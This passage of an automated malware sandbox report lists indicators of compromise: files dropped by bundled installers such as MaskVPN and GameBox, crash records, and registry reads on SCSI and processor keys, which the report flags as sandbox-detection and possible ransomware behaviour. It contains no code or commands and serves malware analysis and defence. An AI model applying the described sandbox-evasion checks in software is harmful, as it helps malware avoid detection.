description ioc Process File created C:\Program Files (x86)\GameBox INC\GameBox\tmp.edb md7_7dfj.exe File created C:\Program Files (x86)\MaskVPN\is-R63S4.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-1A0FI.tmp Setup.tmp File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini Yc94pk6Qb8xoa9ZqzcuEiAiz.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe Esplorarne.exe.com File opened for modification C:\Program Files (x86)\INL Corpo Brovse\javaw.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-A6BU9.tmp Setup.tmp File created C:\Program Files (x86)\Internet Explorer\Hotypevove.exe 3377047_logo_media.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe Setup.exe File created C:\Program Files (x86)\MaskVPN\is-IO3B9.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-FB3TO.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\unins000.msg Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\version MaskVPNUpdate.exe File created C:\Program Files (x86)\INL Corpo Brovse\is-EPOCS.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-OLPIP.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe Esplorarne.exe.com File created C:\Program Files (x86)\INL Corpo Brovse\is-4QJ5B.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-VG5D6.tmp Setup.tmp File created C:\Program Files (x86)\Internet Explorer\Hotypevove.exe.config 3377047_logo_media.exe File created C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.ini Esplorarne.exe.com File opened for modification C:\Program Files (x86)\INL Corpo Brovse\QtProfiler.exe Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.dll Setup.tmp File created C:\Program Files (x86)\INL Corpo Brovse\is-0DTCR.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-P0CUF.tmp Setup.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\jooyu.exe YnHSGQX1ttQX4esXpBPFpc6a.exe File opened for modification C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-3EBQB.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-SJ6ST.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-8OE4A.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-D80ND.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe Esplorarne.exe.com File opened for modification C:\Program Files (x86)\MaskVPN\libCommon.dll Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\d.INTEG.RAW md7_7dfj.exe File opened for modification C:\Program Files (x86)\INL Corpo Brovse\libass.dll Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-L9SB2.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-MLKC7.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe Esplorarne.exe.com File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-G673P.tmp Setup.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-N6TOJ.tmp ultramediaburner.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-H8DJL.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe Esplorarne.exe.com File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe Esplorarne.exe.com File opened for modification C:\Program Files (x86)\MaskVPN\libeay32.dll Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-9VK87.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-B4VCU.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-8HP6F.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe Esplorarne.exe.com File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\is-KLCMA.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-7ARDH.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-ITS1F.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\d md7_7dfj.exe File created C:\Program Files (x86)\INL Corpo Brovse\is-B313R.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-OOCQM.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-JI567.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-005SQ.tmp Setup.tmp File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\customer3.exe Yc94pk6Qb8xoa9ZqzcuEiAiz.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\driver\win732\is-OS424.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-HE14H.tmp Setup.tmp -
Drops file in Windows directory 30 IoCs
description ioc Process File opened for modification C:\Windows\INF\setupapi.dev.log msedge.exe File opened for modification C:\Windows\inf\oem2.inf DrvInst.exe File opened for modification C:\Windows\Installer\MSI7159.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF7D9BB535E8B9AC85.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI244D.tmp msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File created C:\Windows\SystemTemp\~DFECD680E263C738BB.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI9017.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF6529CF6DF7C6309E.TMP msiexec.exe File opened for modification C:\Windows\Installer\f767069.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI341D.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log svchost.exe File opened for modification C:\Windows\Installer\MSIFBB2.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI3FB8.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF31CC275A3C9D1278.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI5062.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI39BB.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIDD6.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\LOGS\DPX\setupact.log expand.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI24B.tmp msiexec.exe File opened for modification C:\Windows\LOGS\DPX\setuperr.log expand.exe File opened for modification C:\Windows\Installer\MSI809.tmp msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File created C:\Windows\inf\oem2.inf DrvInst.exe File opened for modification C:\Windows\Installer\MSIEB14.tmp msiexec.exe File created C:\Windows\Installer\f767069.msi msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 31 IoCs
pid pid_target Process procid_target 1468 4804 WerFault.exe 93 960 556 WerFault.exe 87 5196 1624 WerFault.exe 146 6036 1832 WerFault.exe 100 2916 5728 WerFault.exe 2784 1520 WerFault.exe 90 1500 3696 WerFault.exe 112 3732 2012 WerFault.exe 128 2776 6136 WerFault.exe 189 6812 1232 WerFault.exe 158 2428 5080 WerFault.exe 183 6268 2860 WerFault.exe 219 1232 5644 WerFault.exe 201 4812 6132 WerFault.exe 227 6388 2144 WerFault.exe 249 1816 5320 WerFault.exe 224 5936 2372 WerFault.exe 144 1320 1352 WerFault.exe 222 1128 5336 WerFault.exe 190 2672 6640 WerFault.exe 251 6244 1176 WerFault.exe 197 4516 680 WerFault.exe 290 5812 6428 WerFault.exe 295 2360 3960 WerFault.exe 304 6320 6044 WerFault.exe 264 1464 7040 WerFault.exe 367 2360 4072 WerFault.exe 410 8 5976 WerFault.exe 428 3880 5976 WerFault.exe 428 6256 6072 WerFault.exe 431 3268 5976 WerFault.exe 428 -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI NrLBDgFrC3ZdkgRSNcLC8zYU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID msedge.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Phantom DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\LowerFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs msedge.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID msedge.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 msedge.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Filters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\UpperFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\ConfigFlags msedge.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs msedge.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Cleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier compattelrunner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Cleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Cleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString compattelrunner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz MsiExec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision compattelrunner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried 